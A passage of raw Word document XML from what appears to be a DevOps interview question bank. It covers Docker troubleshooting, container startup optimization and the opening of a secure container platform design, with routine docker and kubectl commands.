        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>Application works inside container but not from browser.</w:t>
        <w:br/>
        <w:t>Container:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cannot access:</w:t>
        <w:br/>
        <w:t>http://localhost:80</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fix</w:t>
        <w:br/>
        <w:t>Expose port:</w:t>
        <w:br/>
        <w:t>docker run -p 80:80 nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify:</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Container Cannot Reach Internet</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>docker exec -it app ping google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Checks</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>cat /etc/resolv.conf</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Possible causes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS issue</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Firewall</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Proxy configuration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. DNS Resolution Failure</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>curl google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Troubleshooting</w:t>
        <w:br/>
        <w:t>nslookup google.com</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>cat /etc/resolv.conf</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Run:</w:t>
        <w:br/>
        <w:t>docker run --dns 8.8.8.8 nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Container Cannot Talk to Another Container</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>App → Database Connection Refused</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Checks</w:t>
        <w:br/>
        <w:t>docker network inspect my-network</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker exec -it app ping db</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Verify both containers are on same network.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Out of Disk Space</w:t>
        <w:br/>
        <w:t>Very common in CI/CD servers.</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>No space left on device</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check</w:t>
        <w:br/>
        <w:t>docker system df</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cleanup</w:t>
        <w:br/>
        <w:t>docker system prune</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Remove unused images:</w:t>
        <w:br/>
        <w:t>docker image prune -a</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Large Docker Images</w:t>
        <w:br/>
        <w:t>Problem</w:t>
        <w:br/>
        <w:t>Image size:</w:t>
        <w:br/>
        <w:t>4 GB</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Builds and deployments become slow.</w:t>
        <w:br/>
        <w:t>Fixes</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>instead of:</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use multi-stage builds:</w:t>
        <w:br/>
        <w:t>FROM golang AS builder</w:t>
        <w:br/>
        <w:t>RUN go build</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:t>COPY --from=builder app .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Permission Denied Errors</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>Permission denied</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>docker run -v /host/data:/data app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container cannot write.</w:t>
        <w:br/>
        <w:t>Checks</w:t>
        <w:br/>
        <w:t>ls -la</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>id</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Possible causes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * UID/GID mismatch</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * File ownership issues</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Volume Mount Problems</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>Data disappears after restart.</w:t>
        <w:br/>
        <w:t>Cause</w:t>
        <w:br/>
        <w:t>Container filesystem is ephemeral.</w:t>
        <w:br/>
        <w:t>Wrong:</w:t>
        <w:br/>
        <w:t>docker run app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Correct:</w:t>
        <w:br/>
        <w:t>docker run -v myvolume:/data app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. Environment Variables Missing</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>Application fails during startup.</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker exec -it app env</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pass variables:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-e DB_HOST=db \</w:t>
        <w:br/>
        <w:t>-e DB_PORT=5432 \</w:t>
        <w:br/>
        <w:t>app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>11. Image Pull Failures</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>pull access denied</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Causes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong image name</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Authentication failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Registry permissions</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker login</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>12. Docker Daemon Not Running</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>docker ps</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>Cannot connect to the Docker daemon</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fix</w:t>
        <w:br/>
        <w:t>Linux:</w:t>
        <w:br/>
        <w:t>sudo systemctl start docker</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>systemctl status docker</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>13. Memory Issues (OOMKilled)</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>Container suddenly stops.</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker inspect &lt;container&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>May show:</w:t>
        <w:br/>
        <w:t>OOMKilled: true</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fix</w:t>
        <w:br/>
        <w:t>Increase memory:</w:t>
        <w:br/>
        <w:t>docker run -m 2g app</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Optimize application memory usage.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>14. Build Failures</w:t>
        <w:br/>
        <w:t>Symptoms</w:t>
        <w:br/>
        <w:t>docker build .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Fails.</w:t>
        <w:br/>
        <w:t>Common Reasons</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Missing files in build context</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Wrong COPY path</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Package download failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Permission issues</w:t>
        <w:br/>
        <w:t>Debug:</w:t>
        <w:br/>
        <w:t>docker build --no-cache .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>15. Container Security Issues</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running as root</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secrets stored in image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unpatched base image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privileged containers</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>USER root</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Better:</w:t>
        <w:br/>
        <w:t>USER appuser</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Scan image using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grype</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (2-Minute Summary)</w:t>
        <w:br/>
        <w:t>Common Docker issues include container crashes, networking and DNS problems, inaccessible ports, image pull failures, disk space exhaustion, volume mount issues, permission errors, OOMKilled containers, and large image sizes. My troubleshooting approach is to first inspect container status with docker ps, review logs using docker logs, inspect configuration with docker inspect, verify networking with docker network inspect, and check resource utilization such as CPU, memory, and disk. For production environments, I also focus on image optimization, security scanning, non-root containers, proper volume management, and monitoring to prevent recurring issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q398. Explain container startup optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Container Startup Optimization?</w:t>
        <w:br/>
        <w:t>Container Startup Optimization is the practice of reducing the time it takes for a container to become fully operational after it starts.</w:t>
        <w:br/>
        <w:t>This is important for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes pod scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Auto-scaling events</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Serverless containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CI/CD deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MLOps inference services</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * High-availability applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Does Startup Time Matter?</w:t>
        <w:br/>
        <w:t>Suppose an HPA scales from:</w:t>
        <w:br/>
        <w:t>5 Pods → 50 Pods</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If each pod takes:</w:t>
        <w:br/>
        <w:t>3 minutes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>to become ready, users may experience:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Increased latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Failed requests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slow scaling</w:t>
        <w:br/>
        <w:t>Optimized startup:</w:t>
        <w:br/>
        <w:t>5–10 seconds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>results in much faster recovery and scaling.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Causes of Slow Startup</w:t>
        <w:br/>
        <w:t>1. Large Container Images</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>FROM ubuntu</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image:</w:t>
        <w:br/>
        <w:t>2 GB</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Every new node must pull it.</w:t>
        <w:br/>
        <w:t>Better</w:t>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>FROM python:3.12-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Result:</w:t>
        <w:br/>
        <w:t>50 MB – 200 MB</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Faster downloads and startup.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Too Many Dependencies</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>RUN apt-get install \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  vim \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  curl \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  wget \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gcc \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  make \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Most are unnecessary at runtime.</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Multi-stage builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Runtime-only dependencies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Slow Application Initialization</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t># Load huge model at startup</w:t>
        <w:br/>
        <w:t>model = load_model("5GB-model")</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Startup:</w:t>
        <w:br/>
        <w:t>120 seconds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Optimization:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lazy loading</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Model caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Model preloading</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Excessive Health Checks</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>initialDelaySeconds: 120</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod stays unready.</w:t>
        <w:br/>
        <w:t>Optimize probes:</w:t>
        <w:br/>
        <w:t>initialDelaySeconds: 10</w:t>
        <w:br/>
        <w:t>periodSeconds: 5</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Database Migrations During Startup</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>Container Start</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Run Migration</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Start Application</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>May take minutes.</w:t>
        <w:br/>
        <w:t>Better:</w:t>
        <w:br/>
        <w:t>Migration Job</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Application Start</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Separate responsibilities.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Optimization Techniques</w:t>
        <w:br/>
        <w:t>1. Use Multi-Stage Builds</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>FROM golang</w:t>
        <w:br/>
        <w:t>RUN go build</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Includes build tools.</w:t>
        <w:br/>
        <w:t>Optimized:</w:t>
        <w:br/>
        <w:t>FROM golang AS builder</w:t>
        <w:br/>
        <w:t>RUN go build</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:t>COPY --from=builder app .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Smaller image</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster startup</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Minimize Image Size</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Distroless images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Slim images</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>FROM gcr.io/distroless/python3</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>FROM python:3.12-slim</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Optimize Layer Caching</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Every code change reinstalls dependencies.</w:t>
        <w:br/>
        <w:t>Better:</w:t>
        <w:br/>
        <w:t>COPY requirements.txt .</w:t>
        <w:br/>
        <w:t>RUN pip install -r requirements.txt</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Faster builds and deployments.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Use BuildKit</w:t>
        <w:br/>
        <w:t>Build images with:</w:t>
        <w:br/>
        <w:t>DOCKER_BUILDKIT=1 docker build .</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Parallel builds</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better caching</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster CI/CD</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Lazy Initialization</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>load_model()</w:t>
        <w:br/>
        <w:t>connect_all_services()</w:t>
        <w:br/>
        <w:t>initialize_everything()</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>before serving requests.</w:t>
        <w:br/>
        <w:t>Better:</w:t>
        <w:br/>
        <w:t>Load only required resources</w:t>
        <w:br/>
        <w:t>Load others on demand</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Optimize Kubernetes Probes</w:t>
        <w:br/>
        <w:t>Startup Probe</w:t>
        <w:br/>
        <w:t>Prevents premature restarts.</w:t>
        <w:br/>
        <w:t>startupProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /health</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 8080</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Readiness Probe</w:t>
        <w:br/>
        <w:t>Traffic only after app is ready.</w:t>
        <w:br/>
        <w:t>readinessProbe:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  httpGet:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    path: /ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">    port: 8080</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Image Pre-Pulling</w:t>
        <w:br/>
        <w:t>Large clusters often pre-pull images.</w:t>
        <w:br/>
        <w:t>Instead of:</w:t>
        <w:br/>
        <w:t>Node Created</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Pull 3GB Image</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Start Pod</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>Node Created</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Image Already Present</w:t>
        <w:br/>
        <w:t>↓</w:t>
        <w:br/>
        <w:t>Immediate Start</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Optimize JVM Applications</w:t>
        <w:br/>
        <w:t>For Java applications:</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>java -jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Optimize:</w:t>
        <w:br/>
        <w:t>java \</w:t>
        <w:br/>
        <w:t>-Xms512m \</w:t>
        <w:br/>
        <w:t>-Xmx512m \</w:t>
        <w:br/>
        <w:t>-XX:+UseContainerSupport \</w:t>
        <w:br/>
        <w:t>-jar app.jar</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Can significantly reduce startup times.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>MLOps Example</w:t>
        <w:br/>
        <w:t>Model-serving container:</w:t>
        <w:br/>
        <w:t>FastAPI</w:t>
        <w:br/>
        <w:t>+</w:t>
        <w:br/>
        <w:t>TensorFlow Model</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Bad startup:</w:t>
        <w:br/>
        <w:t>Download model</w:t>
        <w:br/>
        <w:t>Load model</w:t>
        <w:br/>
        <w:t>Start server</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>90 seconds.</w:t>
        <w:br/>
        <w:t>Optimized:</w:t>
        <w:br/>
        <w:t>Model stored locally</w:t>
        <w:br/>
        <w:t>Image preloaded</w:t>
        <w:br/>
        <w:t>Lazy load model</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10–15 seconds.</w:t>
        <w:br/>
        <w:t>Useful for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubeflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MLflow</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Metrics to Monitor</w:t>
        <w:br/>
        <w:t>Track:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container start time</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod startup latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Time to Ready</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image pull duration</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application initialization time</w:t>
        <w:br/>
        <w:t>Kubernetes commands:</w:t>
        <w:br/>
        <w:t>kubectl describe pod</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl get events</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Container startup optimization focuses on reducing the time required for a container or Kubernetes pod to become operational. Common techniques include minimizing image size using slim or distroless base images, using multi-stage builds, optimizing Docker layer caching, leveraging BuildKit, reducing unnecessary dependencies, implementing lazy initialization, tuning readiness and startup probes, and pre-pulling images on cluster nodes. In MLOps environments, startup optimization is especially important for model-serving workloads where large models can significantly delay pod readiness. The goal is to improve deployment speed, auto-scaling responsiveness, and overall application availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q399. Design a secure container platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secure Container Platform Design</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Git Repo</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>CI/CD Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Image Scan + SBOM + Sign</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Admission Controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Kubernetes Cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Runtime Security + Monitoring</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Secure Build Pipeline</w:t>
        <w:br/>
        <w:t>Use a trusted CI/CD system:</w:t>
        <w:br/>
        <w:t>GitHub Actions / GitLab CI / Jenkins</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pipeline controls:</w:t>
        <w:br/>
        <w:t>Code scan</w:t>
        <w:br/>
        <w:t>Dependency scan</w:t>
        <w:br/>
        <w:t>Dockerfile scan</w:t>
        <w:br/>
        <w:t>Secret scan</w:t>
        <w:br/>
        <w:t>Image vulnerability scan</w:t>
        <w:br/>
        <w:t>SBOM generation</w:t>
        <w:br/>
        <w:t>Image signing</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use SLSA principles to protect the software supply chain from tampering. SLSA is designed to improve artifact integrity and secure build infrastructure. (SLSA)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Secure Container Images</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>FROM distroless</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>or:</w:t>
        <w:br/>
        <w:t>FROM alpine</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices:</w:t>
        <w:br/>
        <w:t>Use minimal base images</w:t>
        <w:br/>
        <w:t>Avoid root user</w:t>
        <w:br/>
        <w:t>Remove package managers</w:t>
        <w:br/>
        <w:t>Use multi-stage builds</w:t>
        <w:br/>
        <w:t>Pin image versions</w:t>
        <w:br/>
        <w:t>Scan images with Trivy/Grype</w:t>
        <w:br/>
        <w:t>Generate SBOM</w:t>
        <w:br/>
        <w:t>Sign images with Cosign</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Cosign can sign and verify container images, including keyless signing using OIDC. (Sigstore)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Private Registry</w:t>
        <w:br/>
        <w:t>Use a private registry like:</w:t>
        <w:br/>
        <w:t>Artifact Registry / ECR / ACR / Harbor</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Controls:</w:t>
        <w:br/>
        <w:t>Private access only</w:t>
        <w:br/>
        <w:t>Image vulnerability scanning</w:t>
        <w:br/>
        <w:t>Immutable tags</w:t>
        <w:br/>
        <w:t>Retention policy</w:t>
        <w:br/>
        <w:t>RBAC</w:t>
        <w:br/>
